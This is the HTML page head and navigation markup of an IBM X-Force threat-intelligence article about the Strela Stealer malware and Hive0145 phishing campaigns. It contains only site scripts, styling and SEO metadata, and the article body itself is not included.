CINXE.COM
Strela Stealer: Today's invoice is tomorrow's phish
<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="shortcut icon" type="image/x-icon" href="https://securityintelligence.com/wp-content/themes/sapphire/images/favicon.ico" sizes="32x32" /> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1"> <!-- DEFINITIONS --> <title>Strela Stealer: Today's invoice is tomorrow's phish</title> <!--<meta name="description" content="">--> <!-- THEME COLOR --> <meta name="theme-color" content="#000000"> <!-- REFERRER POLICY --> <meta name="referrer" content="no-referrer-when-downgrade"> <script src="https://1.www.s81c.com/common/stats/ibm-common.js" type="text/javascript" async="async"></script> <!-- LANGUAGE/TRANSLATIONS --> <!-- AMP SCRIPTS --> <script async src="https://cdn.ampproject.org/v0.js"></script> <script async custom-element="amp-list" src="https://cdn.ampproject.org/v0/amp-list-0.1.js"></script> <script async custom-template="amp-mustache" src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js"></script> <script async custom-element="amp-accordion" src="https://cdn.ampproject.org/v0/amp-accordion-0.1.js"></script> <script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script> <script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script> <script async custom-element="amp-bind" src="https://cdn.ampproject.org/v0/amp-bind-0.1.js"></script> <script async custom-element="amp-autocomplete" src="https://cdn.ampproject.org/v0/amp-autocomplete-0.1.js"></script> <script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.35.0/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/card.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/image.min.js"></script> <script async custom-element="amp-lightbox-gallery" src="https://cdn.ampproject.org/v0/amp-lightbox-gallery-0.1.js"></script> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script> <script async custom-element="amp-youtube" src="https://cdn.ampproject.org/v0/amp-youtube-0.1.js"></script> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-300x158.jpeg.webp" media="(max-width: 300px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp" media="(max-width: 1200px) and (min-width: 301px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp" media="(max-width: 2400px) and (min-width: 631px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp" media="(max-width: 2400px) and (min-width: 1201px)"> <!-- FONTS --> <!-- <link rel="preload" href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500|IBM+Plex+Sans:300,400,500&display=swap" rel="stylesheet"> --> <!-- ANALYTICS --> <script> // Digital Registry digitalData = { "page": { "category": { "primaryCategory": "Threat Intelligence" }, "pageInfo": { "language": "en-US", "country": "US", "version": "custom", "effectiveDate": "2024-11-12", "publishDate": "2024-11-12", "optimizely": { "enabled": "false", }, "ibm": { "contentDelivery": "WordPress", "contentProducer": "Hand coded", "owner": "", "siteID": "SECURITYINTELLIGENCE", "type": "Xforce", } } } } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js function sendClickTag(section, feature, destination) { console.log(section + " " + feature) var config = { type: 'ELEMENT', primaryCategory: section, // e_a1 - Element Category eventName: feature, // e_a2 - Element Name targetURL: destination, // e_a7 - Element Attribute: ibmEvTarget }; ibmStats.event(config); } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js // function sendClickConversion(feature, title) { // var config = { // type : 'pageclick', // primaryCategory : 'PAGE CLICK', // eventCategoryGroup : "TIMELINE - SECURITY INTELLIGENCE", // eventName : feature, // targetTitle : title // }; // ibmStats.event(config); // } // Custom Link Event // Add clicktag event on every link inside the element function tagAllLinks(element, section, feature) { var element = document.querySelectorAll(element); if (typeof(element) != 'undefined' && element != null) { for (var i = 0; i < element.length; i++) { var elements = element[i].querySelectorAll("a:not(.btn)"); for (var o = 0; o < elements.length; o++) { if (elements[o].getAttribute('listener') !== 'true') { var destination = elements[o].getAttribute('href'); elements[o].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag(section, feature, this.getAttribute('href')); this.setAttribute('listener', 'false'); } }, false); elements[o].setAttribute('listener', 'true'); } } } } } window.onload = function() { // Call to action click tag var ctaButton = document.querySelectorAll(".single__content a"); if (typeof(ctaButton) != 'undefined' && ctaButton != null && ctaButton.length !== 0) { for (var i = 0; i < ctaButton.length; i++) { ctaButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "CALL TO ACTION"); this.setAttribute('listener', 'false'); } }, false); ctaButton[i].setAttribute('listener', 'true'); } } // Read more click tag var readButton = document.querySelectorAll(".continue-reading button"); if (typeof(readButton) != 'undefined' && readButton != null && readButton.length !== 0) { for (var i = 0; i < readButton.length; i++) { readButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "READ-MORE"); this.setAttribute('listener', 'false'); } }, false); readButton[i].setAttribute('listener', 'true'); } } // LISTICLES tag - Arrows //left arrow var leftArrow = document.getElementById("prev"); if (typeof(leftArrow) != 'undefined' && leftArrow != null) { //for (var i = 0; i < leftArrow.length; i++) { leftArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && leftArrow.id == "prev") { sendClickTag("BODY", "LISTICLE-LEFT-ARROW"); this.setAttribute('listener', 'false'); } }, false); leftArrow.setAttribute('listener', 'true'); //} } //right arrow var rightArrow = document.getElementById("next"); if (typeof(rightArrow) != 'undefined' && rightArrow != null) { //for (var i = 0; i < rightArrow.length; i++) { rightArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && rightArrow.id == "next") { sendClickTag("BODY", "LISTICLE-RIGHT-ARROW"); this.setAttribute('listener', 'false'); } }, false); rightArrow.setAttribute('listener', 'true'); //} } // LISTICLES tag - numbers var listicleTopButton = document.querySelectorAll(".listicle__pagination__numbers"); if (typeof(listicleTopButton) != 'undefined' && listicleTopButton != null && listicleTopButton.length !== 0) { for (var i = 0; i < listicleTopButton.length; i++) { var currentSlide = 1; listicleTopButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { currentSlide++; var total = i; // var clickedSlides=currentSlide/2; // console.log(clickedSlides.toFixed()); //I'm removing 2 because 2 arrows on the listicle are unclickable, but present on the DOM // clickableArrows = i-2; // clickableArrows = i-1; // I'm deviding by 2 because on each slide we have 2 arrows, so we were actually sendind the double of tags // clickableArrows= clickableArrows/2; // console.log(i); // clickableArrows.toFixed(); if (currentSlide <= total) { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-SLIDE" + currentSlide); this.setAttribute('listener', 'false'); } else { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-END"); this.setAttribute('listener', 'false'); } } }, false); listicleTopButton[i].setAttribute('listener', 'true'); } } // // Timeline box click tag // var boxButton = document.querySelectorAll(".timeline__content .box"); // if (typeof(boxButton) != 'undefined' && boxButton != null && boxButton.length !== 0) { // for (var i = 0; i < boxButton.length; i++) { // boxButton[i].addEventListener('click', function(){ // if (this.getAttribute('listener') === 'true') { // sendClickConversion("DETAILED VIEW", this.getAttribute('data-title')); // this.setAttribute('listener', 'false'); // } // }, false); // boxButton[i].setAttribute('listener', 'true'); // } // } }; </script> <!-- COREMETRICS --> <script defer src="https://1.www.s81c.com/common/stats/ida_stats.js" type="text/javascript"></script> <!-- AMP DEFAULT CSS --> <style amp-boilerplate> body { -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both; animation: -amp-start 8s steps(1, end) 0s 1 normal both } @-webkit-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-moz-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-ms-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-o-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } </style><noscript> <style amp-boilerplate> body { -webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none } </style> </noscript> <link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/modules.css?v=1715191630"> <!-- CUSTOM CSS --> <meta name='robots' content='max-image-preview:large' /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/securityintelligence.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://securityintelligence.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='taxonomy-image-plugin-public-css' href='https://securityintelligence.com/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6' type='text/css' media='screen' /> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/themes/sapphire/app/javascript/si-theme-cookie.js?ver=6.6.2" id="si-cookie-consent-js"></script> <link rel="https://api.w.org/" href="https://securityintelligence.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securityintelligence.com/wp-json/wp/v2/xforce/448388" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securityintelligence.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.6.2" /> <link rel='shortlink' href='https://securityintelligence.com/?p=448388' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fstrela-stealer-todays-invoice-tomorrows-phish%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fstrela-stealer-todays-invoice-tomorrows-phish%2F&format=xml" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png" sizes="32x32" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <meta name="msapplication-TileImage" content="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <style amp-custom>@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans:200,300,400,500,600');@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500,600,700');@import url('https://fonts.googleapis.com/css2?family=IBM+Plex+Serif&display=swap')</style><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/single.css?v=1722279696"> <!-- YOAST SEO --> <!-- This site is optimized with the Yoast SEO Premium plugin v13.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it."/> <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/> <link rel="canonical" href="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Strela Stealer: Today's invoice is tomorrow's phish" /> <meta property="og:description" content="IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it." /> <meta property="og:url" content="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" /> <meta property="og:site_name" content="Security Intelligence" /> <meta property="article:tag" content="Europe" /> <meta property="article:tag" content="Malware" /> <meta property="article:tag" content="Phishing" /> <meta property="article:tag" content="Ransomware" /> <meta property="article:tag" content="X-Force" /> <meta property="article:section" content="Threat Intelligence" /> <meta property="fb:app_id" content="3703311399714818" /> <meta property="og:image" content="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg" /> <meta property="og:image:secure_url" content="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it." /> <meta name="twitter:title" content="Strela Stealer: Today's invoice is tomorrow's phish" /> <meta name="twitter:image" content="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://securityintelligence.com/#website","url":"https://securityintelligence.com/","name":"Security Intelligence","inLanguage":"en-US","description":"Analysis and Insight for Information Security Professionals","potentialAction":{"@type":"SearchAction","target":"https://securityintelligence.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/#primaryimage","inLanguage":"en-US","url":"https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg","width":1200,"height":630,"caption":"closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols"},{"@type":"WebPage","@id":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/#webpage","url":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/","name":"Strela Stealer: Today's invoice is tomorrow's phish","isPartOf":{"@id":"https://securityintelligence.com/#website"},"inLanguage":"en-US","primaryImageOfPage":{"@id":"https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/#primaryimage"},"datePublished":"2024-11-12T11:00:00+00:00","dateModified":"2024-11-14T23:28:12+00:00","description":"IBM X-Force has been tracking ongoing Hive0145 campaigns delivering Strela Stealer malware for over a year. Learn more about the malware, the techniques for spreading it, and how to protect against it."}]}</script> <!-- / Yoast SEO Premium plugin. --> </head> <body class="si_body" > <nav id="navigation" class="navigation navigation--homepage " aria-label="Security Intelligence"> <div class="container"> <div class="row"> <!-- LOGO --> <div class="navigation__brand"> <a href="https://securityintelligence.com" title="Security Intelligence" tabindex="1"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence Logo"> <div fallback> <h6>Security Intelligence</h6> </div> </amp-img> </a> </div> <!-- DESKTOP MENU - HOVER --> <div class="navigation__menu" onmouseleave="delete localStorage['megamenu-status']"> <a tabindex="2" id="nav-news" href="/news/" class="navigation__button " data-menu="megamenu__news" onclick="localStorage['megamenu-status'] = 'first-interaction';">News</a> <a tabindex="4" id="nav-topics" href="/category/topics/" class="navigation__button " data-menu="megamenu__topics" onclick="localStorage['megamenu-status'] = 'first-interaction';">Topics</a> <a tabindex="5" id="nav-x-force" href="/x-force/" class="navigation__button " data-menu="megamenu__threat" onclick="localStorage['megamenu-status'] = 'first-interaction';">X-Force</a> <a tabindex="6" id="nav-media" href="/media/" class="navigation__button " data-menu="megamenu__podcast" onclick="localStorage['megamenu-status'] = 'first-interaction';">Podcast</a> <button aria-label="search Button" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="-1" type="button"> <amp-img tabindex="7" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Click to open the search bar"></amp-img> </button> </div> <!-- TABLET MENU - TAP/CLICK --> <div id="search-tablet" class="navigation__menu navigation__menu--tablet" tabindex="-1"> <button type="button" 